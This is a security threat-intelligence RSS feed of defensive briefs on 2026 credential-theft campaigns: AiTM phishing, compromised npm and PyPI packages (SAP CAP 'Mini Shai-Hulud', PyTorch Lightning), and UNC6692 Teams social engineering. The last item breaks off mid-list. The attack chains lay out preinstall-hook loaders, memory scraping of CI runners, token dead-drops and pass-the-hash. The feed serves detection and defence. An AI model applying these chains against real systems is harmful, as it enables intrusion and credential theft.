<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Credential-Theft — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/credential-theft/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 04 May 2026 15:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/credential-theft/feed.xml" rel="self" type="application/rss+xml"/><item><title>Multi-Stage 'Code of Conduct' Phishing Campaign Leads to AiTM Token Compromise</title><link>https://feed.craftedsignal.io/briefs/2026-05-aitm-phishing/</link><pubDate>Mon, 04 May 2026 15:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-aitm-phishing/</guid><description>A widespread phishing campaign utilized 'code of conduct' lures, a multi-step attack chain, and legitimate email services to distribute authenticated messages from attacker-controlled domains, ultimately leading to adversary-in-the-middle (AiTM) token compromise, primarily targeting US-based organizations.</description><content:encoded><![CDATA[<p>Between April 14 and 16, 2026, Microsoft Defender Research observed a sophisticated, large-scale phishing campaign targeting over 35,000 users across more than 13,000 organizations in 26 countries, predominantly in the United States (92%). The campaign, which did not focus on a single vertical, impacted a range of industries, with Healthcare &amp; life sciences (19%), Financial services (18%), Professional services (11%), and Technology &amp; software (11%) being the most affected. Attackers employed code of conduct-themed lures delivered via emails that appeared as internal compliance or regulatory communications. The campaign utilized a multi-step attack chain, including CAPTCHA challenges and intermediate staging pages, to reinforce legitimacy and filter out automated defenses, ultimately leading to an adversary-in-the-middle (AiTM) phishing flow.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attack begins with phishing emails posing as internal compliance communications, using subjects like &ldquo;Internal case log issued under conduct policy&rdquo;.</li>
<li>The emails contain a PDF attachment (e.g., &ldquo;Awareness Case Log File – Tuesday 14th, April 2026.pdf&rdquo;) that claims a &ldquo;code of conduct review&rdquo; has been initiated.</li>
<li>Recipients are instructed to click a “Review Case Materials” link within the PDF.</li>
<li>Clicking the link redirects the user to one of the attacker-controlled domains (e.g., acceptable-use-policy-calendly[.]de).</li>
<li>The landing page displays a Cloudflare CAPTCHA to validate the user and impede automated analysis.</li>
<li>After CAPTCHA completion, the user is redirected to an intermediate site that informs them the requested documentation is encrypted and requires account authentication.</li>
<li>The user is presented with a legitimate-looking sign-in experience, part of an AiTM phishing flow.</li>
<li>The attackers proxy the authentication session in real time and capture authentication tokens, granting immediate account access.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This campaign resulted in the compromise of authentication tokens, enabling attackers to gain unauthorized access to user accounts and bypass multifactor authentication. With more than 35,000 users targeted across over 13,000 organizations, the potential for widespread data breaches, financial fraud, and further malicious activities is significant. The targeting of sectors like Healthcare and Financial Services indicates a focus on high-value targets with sensitive data.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Educate users about phishing lures, especially those using social engineering tactics and enterprise-style HTML templates.</li>
<li>Deploy the Sigma rule &ldquo;Detect Suspicious PDF Opening via Uncommon Applications&rdquo; to identify unusual PDF execution paths, based on the &lsquo;file_event&rsquo; log source.</li>
<li>Configure email security settings in Microsoft Defender for Office 365 to filter out phishing emails effectively.</li>
<li>Enable network protection to leverage SmartScreen as a host-based web proxy.</li>
<li>Block access to the attacker-controlled domains, such as acceptable-use-policy-calendly[.]de, at the DNS resolver level.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>phishing</category><category>credential-theft</category><category>AiTM</category><category>token-compromise</category></item><item><title>Compromised Bitwarden CLI npm Package Enables Credential Theft and Information Exfiltration</title><link>https://feed.craftedsignal.io/briefs/2026-05-bitwarden-cli-compromise/</link><pubDate>Mon, 04 May 2026 11:28:56 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-bitwarden-cli-compromise/</guid><description>A remote attacker can exploit a compromised Bitwarden CLI npm package to steal credentials and exfiltrate sensitive information.</description><content:encoded><![CDATA[<p>A compromised Bitwarden CLI npm package allows a remote, anonymous attacker to steal credentials and exfiltrate sensitive information. The specific version of the compromised package is not detailed in the advisory. This supply chain attack targets developers and users who rely on the Bitwarden CLI for managing their passwords and secrets. This attack has the potential to expose sensitive credentials, leading to unauthorized access to systems and data. Defenders need to monitor for unusual activity related to the Bitwarden CLI and its usage within their environments to mitigate this risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker compromises a Bitwarden CLI npm package through techniques such as typosquatting, account compromise, or dependency confusion.</li>
<li>Unsuspecting developers or users download and install the compromised package from the npm registry.</li>
<li>During installation, the malicious package executes malicious code injected by the attacker.</li>
<li>The malicious code collects Bitwarden credentials and other sensitive information stored in the CLI&rsquo;s configuration.</li>
<li>The compromised package establishes a covert communication channel (e.g., HTTPS) to an attacker-controlled server.</li>
<li>Stolen credentials and sensitive information are exfiltrated to the attacker&rsquo;s server.</li>
<li>The attacker uses the stolen credentials to access victim&rsquo;s Bitwarden vaults or other systems.</li>
<li>The attacker may further escalate privileges and compromise additional systems within the victim&rsquo;s environment using the stolen credentials.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation leads to the theft of sensitive credentials and information stored within Bitwarden CLI. The number of victims is currently unknown. Organizations using the compromised package could experience unauthorized access to critical systems, data breaches, and potential financial losses. The targeted sectors are broad, encompassing any organization utilizing the Bitwarden CLI for password management and secret storage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor npm package installations for unusual activity or unexpected dependencies using process creation logs and file integrity monitoring.</li>
<li>Implement strict code review processes for all third-party dependencies, especially those related to security tools like Bitwarden CLI.</li>
<li>Deploy the Sigma rule detecting suspicious network connections from the Bitwarden CLI executable to identify potential data exfiltration.</li>
<li>Enforce multi-factor authentication (MFA) on Bitwarden accounts to mitigate the impact of credential theft.</li>
<li>Regularly audit and review the permissions and access rights associated with Bitwarden CLI credentials.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>credential-theft</category><category>exfiltration</category><category>npm</category></item><item><title>Increased npm Supply Chain Attacks Targeting SAP Developers</title><link>https://feed.craftedsignal.io/briefs/2026-05-npm-supply-chain/</link><pubDate>Sat, 02 May 2026 00:10:33 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-npm-supply-chain/</guid><description>Threat actors are compromising npm packages, including those targeting SAP developers, to steal credentials, embed themselves in CI/CD pipelines, and deploy multi-stage payloads using techniques like wormable propagation and covert C2 channels on GitHub.</description><content:encoded><![CDATA[<p>The npm ecosystem is experiencing a surge in sophisticated supply chain attacks following the Shai-Hulud worm in September 2025. Attackers, including TeamPCP, are actively compromising npm packages to gain access to sensitive information and establish persistence within CI/CD pipelines. The attacks have evolved to include wormable propagation, infrastructure-level persistence, and multi-stage payloads designed to evade detection. In April 2026, two campaigns were observed: one included the string &ldquo;Shai-Hulud: The Third Coming,&rdquo; and the other, dubbed &ldquo;Mini Shai-Hulud,&rdquo; targeted the SAP developer ecosystem. The compromised packages are often part of SAP&rsquo;s Cloud Application Programming (CAP) Model and multitarget application (MTA) build toolchain, increasing the likelihood of impacting enterprise developers and CI/CD pipelines with access to cloud credentials and GitHub tokens.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial Compromise: Attackers compromise legitimate npm packages, such as @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt, by injecting malicious code.</li>
<li>Malicious Code Injection: Compromised packages receive two new files: setup.mjs and execution.js, along with a modified package.json containing a &ldquo;preinstall&rdquo; hook.</li>
<li>Execution of setup.mjs: During the <code>npm install</code> process, the preinstall hook executes setup.mjs, which detects the host OS and architecture.</li>
<li>Bun Runtime Download and Execution: setup.mjs downloads the Bun JavaScript runtime (v1.3.13) from GitHub releases and extracts it to a temporary directory.</li>
<li>Execution of execution.js: The Bun runtime executes execution.js, a large (11.7 MB) obfuscated credential stealer and propagation framework.</li>
<li>Credential Harvesting: execution.js harvests GitHub tokens, npm tokens, environment variables, GitHub Actions secrets, AWS STS identity, Azure Key Vault secrets, GCP Secret Manager values, and Kubernetes service account tokens. It also targets Claude and MCP configuration files and Electrum wallets.</li>
<li>Data Exfiltration: The collected data is compressed, encrypted, and exfiltrated to freshly created public GitHub repositories with randomized names and descriptions.</li>
<li>Propagation: The malware searches for commits containing the keyword &ldquo;OhNoWhatsGoingOnWithGitHub,&rdquo; decodes matching commit messages as a token dead-drop, recovers stolen GitHub tokens, and uses them to spread the malware to other packages.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromised npm packages can lead to the theft of sensitive credentials, including cloud provider credentials, GitHub tokens, and CI/CD secrets. Successful attacks can result in unauthorized access to cloud infrastructure, code repositories, and deployment pipelines. The Mini Shai-Hulud campaign targeted packages with approximately 570,000 weekly downloads, potentially impacting a large number of SAP developers and enterprise environments. The attackers use stolen credentials to further propagate the malware, increasing the scale and scope of the compromise.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Rotate npm tokens and GitHub Personal Access Tokens (PATs) immediately if any affected packages were installed (refer to the list of affected packages in the IOC table).</li>
<li>Monitor npm install processes for unexpected execution of <code>node setup.mjs</code> (see Attack Chain).</li>
<li>Implement the Sigma rule &ldquo;Detect Suspicious Bun Process Execution&rdquo; to identify potential execution of the Bun runtime from temporary directories.</li>
<li>Monitor network connections for unusual processes connecting to <code>api.github[.]com/search/commits?q=OhNoWhatsGoingOnWithGitHub</code> (see IOCs) to detect potential C2 activity.</li>
<li>Deploy the Sigma rule &ldquo;Detect Github Commit By Claude Email&rdquo; to identify commits authored with the email <code>claude@users.noreply.github.com</code> to detect malicious commits.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category><category>npm</category><category>supply-chain</category><category>credential-theft</category><category>github</category></item><item><title>Compromised PyTorch Lightning Packages on PyPI Steal Developer Credentials</title><link>https://feed.craftedsignal.io/briefs/2026-05-pytorch-lightning-compromise/</link><pubDate>Fri, 01 May 2026 00:45:31 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-pytorch-lightning-compromise/</guid><description>Compromised PyTorch Lightning packages versions 2.6.2 and 2.6.3 on PyPI contain malicious code to steal developer credentials from cloud and developer environments, and republish infected packages.</description><content:encoded><![CDATA[<p>On April 30, 2026, two malicious versions (2.6.2 and 2.6.3) of the widely used <code>pytorch-lightning</code> package were published to the PyPI registry after the publisher account was compromised. These versions contain embedded malicious code designed to steal developer credentials and republish infected versions of repositories to which the stolen tokens have access. The attack is triggered upon importing the package, initiating a background process that silently harvests credentials from a wide array of services, including AWS, Azure, Google Cloud, and GitHub, as well as local environment variables and credential files. Version 2.6.3 was published just 13 minutes after 2.6.2, and was intended to evade detection.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker compromises the publisher account for the <code>pytorch-lightning</code> package on PyPI.</li>
<li>Attacker publishes malicious versions 2.6.2 and 2.6.3 to PyPI.</li>
<li>A modified <code>__init__.py</code> file within the package initiates a background process upon import.</li>
<li>The background process executes silently, without any visible output or indication of compromise to the user.</li>
<li>The malicious package downloads a runtime (Bun) from GitHub.</li>
<li>The package executes a large, obfuscated JavaScript file, targeting AWS, Azure, Google Cloud, GitHub, and local credential stores.</li>
<li>Stolen credentials, including cloud provider keys, API tokens, and secrets, are exfiltrated to attacker-controlled infrastructure.</li>
<li>The malware attempts to download and execute a second-stage payload from attacker-controlled infrastructure, expanding the scope of the attack.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Organizations that downloaded and used versions 2.6.2 or 2.6.3 of the <code>pytorch-lightning</code> package are at high risk of compromise. The malicious package is designed to steal a wide range of credentials, including cloud provider keys, API tokens, and secrets stored in environment variables. This can lead to unauthorized access to sensitive data and systems, potentially resulting in data breaches, financial losses, and reputational damage. The malware&rsquo;s ability to download and execute secondary payloads further increases the potential impact.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately remove versions 2.6.2 and 2.6.3 of the <code>lightning</code> package from all systems where they are installed (see overview).</li>
<li>Audit systems for unauthorized processes and review outbound network connections to detect potential compromises (see overview).</li>
<li>Rotate all cloud provider keys (AWS, Azure, GCP), API tokens (GitHub, CI/CD systems), and secrets stored in environment variables to prevent further unauthorized access (see Attack Chain).</li>
<li>Implement the <code>Detect Suspicious PyPI Package Installation</code> Sigma rule to identify potential malicious packages being installed in the future (see rules).</li>
<li>Implement the <code>Detect Credential Harvesting via Bun</code> Sigma rule to catch execution of the malicious JavaScript payload (see rules).</li>
<li>Pin dependencies to known-good versions and verify package integrity before use to prevent future supply chain attacks (see references).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>pypi</category><category>credential-theft</category><category>malware</category></item><item><title>Q1 2026 Email Threat Landscape: Rise in Phishing Techniques and Tycoon2FA Disruption</title><link>https://feed.craftedsignal.io/briefs/2026-05-email-phishing-trends/</link><pubDate>Thu, 30 Apr 2026 15:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-email-phishing-trends/</guid><description>In Q1 2026, email threats increased, including credential phishing, QR code phishing, and CAPTCHA-gated campaigns, with Microsoft's disruption of the Tycoon2FA phishing platform leading to a 15% volume decrease and shifts in threat actor tactics; BEC activity remained prevalent at 10.7 million attacks.</description><content:encoded><![CDATA[<p>In the first quarter of 2026, Microsoft Threat Intelligence observed a significant rise in email-based phishing threats, totaling approximately 8.3 billion. This increase was driven by surges in QR code phishing (more than doubling over the period), CAPTCHA-gated phishing, and credential phishing attacks. Microsoft&rsquo;s Digital Crime Unit successfully disrupted the Tycoon2FA phishing-as-a-service (PhaaS) platform in early March, leading to a 15% reduction in associated email volume. However, threat actors adapted by shifting hosting providers and domain registration patterns. Business email compromise (BEC) also remained a prevalent threat, with approximately 10.7 million attacks recorded during the quarter, often characterized by low-effort, generic outreach messages. Microsoft Defender Research has also noted the emergence of AI-enabled device code phishing campaigns.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Email Delivery:</strong> Attackers send phishing emails impersonating legitimate services or organizations. These emails may contain links, QR codes, or HTML attachments.</li>
<li><strong>Victim Interaction:</strong> The victim opens the email and clicks on a malicious link or scans a QR code, redirecting them to a phishing page.</li>
<li><strong>Phishing Page Redirection:</strong> The phishing page mimics a legitimate login portal, such as Microsoft 365 or other enterprise applications.</li>
<li><strong>Credential Harvesting:</strong> The victim enters their username and password on the phishing page, which are then captured by the attacker.</li>
<li><strong>MFA Bypass (AiTM):</strong> For attacks using adversary-in-the-middle (AiTM) techniques (like those facilitated by Tycoon2FA), the attacker intercepts the MFA code and uses it to authenticate.</li>
<li><strong>Account Compromise:</strong> With the stolen credentials and MFA code (if applicable), the attacker gains unauthorized access to the victim&rsquo;s account.</li>
<li><strong>Lateral Movement/Data Theft:</strong> The attacker uses the compromised account to access sensitive data, send further phishing emails, or move laterally within the organization.</li>
<li><strong>Business Email Compromise:</strong> In BEC attacks, attackers use compromised accounts or spoofed email addresses to send fraudulent invoices or requests for wire transfers.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The observed email threats in Q1 2026 led to a high risk of credential compromise, financial loss through BEC attacks, and potential data breaches across various sectors. Although the total number of victims is not specified, the billions of phishing attempts indicate a widespread impact. Microsoft&rsquo;s disruption of Tycoon2FA temporarily reduced phishing volumes by 15%, demonstrating the potential for proactive intervention to mitigate these threats. However, threat actors are quickly adapting their techniques, indicating the need for continued vigilance and enhanced security measures. The 10.7 million BEC attacks alone represent a significant financial threat to businesses.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the &ldquo;Detect Tycoon2FA Phishing Attempts&rdquo; Sigma rule to identify email campaigns associated with the Tycoon2FA platform.</li>
<li>Enable Microsoft Defender detections to improve detection of phishing emails and malicious payloads.</li>
<li>Monitor email traffic for suspicious domain registrations, particularly those using newer generic top-level domains (TLDs) such as .DIGITAL, .BUSINESS, .CONTRACTORS, .CEO, and .COMPANY, and the resurgence of .RU registrations, to identify potential Tycoon2FA infrastructure shifts.</li>
<li>Educate users about the dangers of QR code phishing and CAPTCHA-gated attacks, emphasizing the importance of verifying the legitimacy of login pages and email senders, to reduce the effectiveness of phishing campaigns (T1566).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category><category>email</category><category>phishing</category><category>credential-theft</category><category>Tycoon2FA</category><category>BEC</category></item><item><title>Mini Shai-Hulud Supply Chain Attack Targets SAP NPM Packages</title><link>https://feed.craftedsignal.io/briefs/2026-04-mini-shai-hulud/</link><pubDate>Thu, 30 Apr 2026 14:27:36 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-mini-shai-hulud/</guid><description>The Mini Shai-Hulud campaign injected malicious code into SAP NPM packages, targeting credentials and cloud secrets related to SAP Cloud Application Programming (CAP) and SAP cloud deployment workflows, exfiltrating data through public GitHub repositories.</description><content:encoded><![CDATA[<p>The Mini Shai-Hulud campaign, active as of April 2026, targets SAP NPM packages used in the SAP Cloud Application Programming (CAP) ecosystem and SAP cloud deployment workflows. Four package versions were compromised: <code>mbt 1.2.48</code>, <code>@cap-js/db-service 2.10.1</code>, <code>@cap-js/postgres 2.2.2</code>, and <code>@cap-js/sqlite 2.2.2</code>. These packages, with over 500,000 combined weekly downloads, are essential for SAP&rsquo;s Cloud MTA Build Tool and database services for CAP software. The attackers injected a preinstall script that fetches and executes a Bun binary, bypassing security monitoring. The malicious versions were available for a short window of 2-4 hours before being unpublished and superseded by clean versions. Wiz attributes this activity to TeamPCP due to a shared RSA public key used to encrypt the exfiltrated secrets.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker compromises an NPM token, possibly exposed through CircleCI.</li>
<li>The attacker injects a malicious <code>preinstall</code> script into the targeted SAP NPM packages (<code>mbt</code>, <code>@cap-js/db-service</code>, <code>@cap-js/postgres</code>, <code>@cap-js/sqlite</code>).</li>
<li>When a user installs the compromised package, the <code>preinstall</code> script executes.</li>
<li>The script fetches a Bun ZIP archive from a GitHub repository.</li>
<li>The script extracts the Bun archive and executes the included Bun binary.</li>
<li>The Bun binary steals local credentials, GitHub and NPM tokens, AWS, Azure, GCP, GitHub Action, and Kubernetes secrets.</li>
<li>The stolen data is exfiltrated to public GitHub repositories with the description &ldquo;A Mini Shai-Hulud has Appeared&rdquo;.</li>
<li>The malware propagates by modifying package tarballs, updating versions, repackaging them, and publishing them using stolen GitHub Actions tokens.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The Mini Shai-Hulud attack poses a significant threat to developers and organizations using SAP CAP, a framework for S/4HANA extensions, Fiori app backends, MTAs, and integration flows. With over 500,000 weekly downloads of the affected packages, a large number of systems could have been affected. Successful exploitation allows attackers to steal sensitive credentials and cloud secrets, potentially leading to unauthorized access to critical SAP systems, cloud infrastructure, and source code repositories. This access could be used for further malicious activities, including data breaches, financial fraud, and supply chain compromise.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Organizations using SAP Business Technology Platform workflows, SAP CAP, or MTA-based deployment pipelines should immediately check if they installed the malicious package versions (<code>mbt 1.2.48</code>, <code>@cap-js/db-service 2.10.1</code>, <code>@cap-js/postgres 2.2.2</code>, <code>@cap-js/sqlite 2.2.2</code>) during the exposure window.</li>
<li>Implement network monitoring rules to detect connections to unusual GitHub repositories created to host stolen data. Monitor for repositories with the description &ldquo;A Mini Shai-Hulud has Appeared&rdquo;.</li>
<li>Monitor process execution for the execution of <code>bun</code> binaries in unusual or unexpected locations to identify systems where compromised packages were installed. Deploy the Sigma rule <code>Detect Bun Execution From NPM Package</code> to detect this behavior.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>supply-chain</category><category>npm</category><category>sap</category><category>credential-theft</category></item><item><title>Compromised SAP npm Packages Steal Developer Credentials</title><link>https://feed.craftedsignal.io/briefs/2026-04-sap-npm-compromise/</link><pubDate>Wed, 29 Apr 2026 22:43:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-sap-npm-compromise/</guid><description>Multiple official SAP npm packages were compromised via a supply chain attack, likely by TeamPCP, to steal credentials and authentication tokens from developers' systems.</description><content:encoded><![CDATA[<p>On April 29, 2026, security researchers discovered that multiple official SAP npm packages were compromised in a supply-chain attack, suspected to be carried out by TeamPCP. The compromised packages, including <code>@cap-js/sqlite</code> (v2.2.2), <code>@cap-js/postgres</code> (v2.2.2), <code>@cap-js/db-service</code> (v2.10.1), and <code>mbt</code> (v1.2.48), support SAP&rsquo;s Cloud Application Programming Model (CAP) and Cloud MTA, commonly used in enterprise development. The attack involves injecting a malicious &lsquo;preinstall&rsquo; script into these packages, which executes automatically during installation. This script downloads and executes a heavily obfuscated JavaScript payload designed to steal sensitive credentials from developer machines and CI/CD environments. This incident highlights the ongoing risk of supply chain attacks targeting widely used development tools.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Compromise:</strong> Threat actors compromise official SAP npm packages (<code>@cap-js/sqlite</code>, <code>@cap-js/postgres</code>, <code>@cap-js/db-service</code>, <code>mbt</code>). The exact method of initial compromise is currently unknown, but a misconfigured CircleCI job is suspected.</li>
<li><strong>Package Modification:</strong> The compromised npm packages are modified to include a malicious &lsquo;preinstall&rsquo; script.</li>
<li><strong>Installation Trigger:</strong> When developers install the compromised packages using <code>npm install</code>, the &lsquo;preinstall&rsquo; script executes automatically.</li>
<li><strong>Payload Download:</strong> The &lsquo;preinstall&rsquo; script launches a loader named <code>setup.mjs</code> that downloads the Bun JavaScript runtime from GitHub.</li>
<li><strong>Execution of Information Stealer:</strong> The Bun runtime is used to execute a heavily obfuscated <code>execution.js</code> payload, which acts as an information stealer.</li>
<li><strong>Credential Theft:</strong> The information stealer targets a wide variety of credentials, including npm and GitHub authentication tokens, SSH keys, cloud credentials for AWS, Azure, and Google Cloud, Kubernetes configurations and secrets, and CI/CD pipeline secrets and environment variables.  It also attempts to extract secrets directly from the CI runner&rsquo;s memory by scanning <code>/proc/&lt;pid&gt;/maps</code> and <code>/proc/&lt;pid&gt;/mem</code>.</li>
<li><strong>Data Exfiltration:</strong> The stolen data is encrypted and uploaded to public GitHub repositories under the victim&rsquo;s account. These repositories include the description &ldquo;A Mini Shai-Hulud has Appeared&rdquo;.</li>
<li><strong>Lateral Movement:</strong> The malware searches GitHub commits for the string <code>OhNoWhatsGoingOnWithGitHub:&lt;base64&gt;</code>, decoding matching commit messages into GitHub tokens to gain further access and propagate to other packages and repositories, injecting the same malicious code.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain attack can lead to the theft of sensitive credentials, allowing attackers to gain unauthorized access to internal systems, cloud infrastructure, and source code repositories. The compromised credentials and secrets can be used for lateral movement within the victim&rsquo;s network, data exfiltration, and further supply chain attacks. The use of stolen credentials to modify other packages increases the scope of the attack, potentially impacting a large number of developers and organizations using the compromised SAP packages.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor npm package installations for the presence of <code>preinstall</code> scripts executing unusual processes, such as the execution of <code>setup.mjs</code> or the download of the Bun JavaScript runtime from GitHub; implement the <code>Detect Suspicious NPM Package Preinstall Script</code> Sigma rule.</li>
<li>Implement the <code>Detect GitHub Repository Creation with &quot;A Mini Shai-Hulud has Appeared&quot; Description</code> Sigma rule to detect exfiltration attempts via public GitHub repositories.</li>
<li>Audit CI/CD pipeline configurations and restrict access to sensitive credentials and secrets to prevent exposure via misconfigured jobs; remediate the reported CircleCI misconfiguration.</li>
<li>Monitor process memory for credential harvesting activity targeting Runner processes in CI/CD environments, specifically looking for reads of <code>/proc/&lt;pid&gt;/maps</code> and <code>/proc/&lt;pid&gt;/mem</code> as outlined in the overview.</li>
<li>Deprecate and remove the compromised packages <code>@cap-js/sqlite</code> (v2.2.2), <code>@cap-js/postgres</code> (v2.2.2), <code>@cap-js/db-service</code> (v2.10.1), and <code>mbt</code> (v1.2.48) from your development and CI/CD environments.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>supply-chain</category><category>credential-theft</category><category>npm</category></item><item><title>UNC6692 Combines Social Engineering, Malware, and Cloud Abuse</title><link>https://feed.craftedsignal.io/briefs/2026-04-unc6692-social-engineering/</link><pubDate>Tue, 28 Apr 2026 14:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-unc6692-social-engineering/</guid><description>UNC6692 is a newly discovered, financially motivated threat actor that combines social engineering via Microsoft Teams, custom malware named SNOWBELT, and abuse of legitimate AWS S3 cloud infrastructure in its attack campaigns to steal credentials and prepare for data exfiltration.</description><content:encoded><![CDATA[<p>UNC6692 is a newly tracked, financially motivated threat group that employs a multi-stage intrusion campaign combining persistent social engineering and custom modular malware. The actor begins by flooding a target&rsquo;s email inbox before contacting them via Microsoft Teams, posing as help desk personnel to resolve the issue. This leads to a phishing attack where victims are tricked into downloading and executing malicious payloads. UNC6692 abuses legitimate cloud infrastructure, specifically AWS S3 buckets, for payload delivery, command and control (C2), and data exfiltration, allowing them to bypass traditional network reputation filters. The group&rsquo;s operations are focused on gaining access and stealing credentials for further actions, ultimately aiming to exfiltrate data of interest from compromised systems. The initial campaign was observed in late December.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker floods a target&rsquo;s email inbox to create a sense of urgency.</li>
<li>The attacker contacts the target via Microsoft Teams, impersonating help desk personnel.</li>
<li>The attacker sends a phishing link via Teams, promising a local patch to fix the email spamming issue.</li>
<li>The target clicks the link, which downloads a renamed AutoHotKey binary and an AutoHotkey script from a threat actor-controlled AWS S3 bucket.</li>
<li>Execution of the AutoHotKey binary automatically runs the script, initiating reconnaissance commands and installing the SNOWBELT malicious Chromium browser extension.</li>
<li>SNOWBELT facilitates the download of additional tools, including the Snowglaze Python tunneler, the Snowbasin Python bindshell (used as a persistent backdoor), additional AutoHotkey scripts, and a portable Python executable with required libraries.</li>
<li>The attacker uses a Python script to scan the local network for ports 135, 445, and 3389 and enumerate local administrator accounts.</li>
<li>The attacker uses a local administrator account to initiate an RDP session via Snowglaze from the compromised system to a backup server, then dumps LSASS process memory and uses pass-the-hash to move laterally to the domain controller.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The UNC6692 attack leads to the compromise of targeted systems, credential theft, and potential data exfiltration. If successful, the attacker gains control over the domain controller, allowing them to access sensitive information and potentially cause significant damage to the organization. The abuse of AWS S3 buckets allows the threat actor to blend in with legitimate cloud traffic, making detection more difficult. The financial motivation suggests that stolen credentials and data could be used for further malicious activities, such as ransomware attacks or sale on the dark web.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor for AutoHotKey execution, especially when associated with downloads from unusual locations like AWS S3 buckets, to detect initial payload execution (see Sigma rule below).</li>
<li>Implement network monitoring to detect unusual RDP connections initiated from compromised systems to internal servers, as this is a key lateral movement technique used by UNC6692 (see Sigma rule below).</li>
<li>Monitor for the installation of new Chromium extensions, especially those not distributed through the Chrome Web Store, as this is how the SNOWBELT malware is deployed.</li>
<li>Monitor for the use of Python scripts to scan the local network for open ports (135, 445, 3389) and enumerate local administrator accounts.</li>
<li>Investigate any Microsoft Teams messages delivering links that promise to fix technical problems, as this is the initial social engineering tactic used by UNC6692.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category><category>social-engineering</category><category>malware</category><category>cloud-abuse</category><category>credential-theft</category><category>lateral-movement</category></item><item><title>AWS Credentials Used from GitHub Actions and Non-CI/CD Infrastructure</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-github-actions-credential-theft/</link><pubDate>Wed, 22 Apr 2026 17:45:55 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-github-actions-credential-theft/</guid><description>Attackers are stealing AWS credentials configured as GitHub Actions secrets and using them from non-CI/CD infrastructure, indicating potential credential theft and unauthorized access to AWS resources.</description><content:encoded><![CDATA[<p>This threat involves the unauthorized use of AWS credentials stolen from GitHub Actions secrets. Attackers exfiltrate these credentials and use them from their own infrastructure, bypassing the intended CI/CD environment. The activity is detected by observing AWS access keys appearing in CloudTrail logs originating from both legitimate GitHub Actions runners (identified by Microsoft ASN or the <code>github-actions</code> user agent string) and suspicious infrastructure outside the expected CI/CD provider ASNs (Amazon, Google, Microsoft). This indicates a breach of GitHub repository or organization secrets, leading to potential unauthorized access and control over AWS resources. This activity can begin with compromised Github accounts.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to a GitHub repository or organization with AWS credentials stored as secrets.</li>
<li>The attacker exfiltrates the AWS access key ID and secret access key, either manually or through automated means, such as modifying a GitHub Action workflow to expose the secrets.</li>
<li>The attacker configures the stolen AWS credentials on their own infrastructure, using tools like the AWS CLI or boto3.</li>
<li>The attacker attempts to authenticate to AWS using the stolen credentials. This generates CloudTrail logs with the attacker&rsquo;s source IP address and ASN.</li>
<li>The attacker performs reconnaissance activities, such as calling <code>sts:GetCallerIdentity</code>, <code>ListBuckets</code>, <code>DescribeInstances</code>, or <code>ListUsers</code>, to understand the AWS environment and identify potential targets.</li>
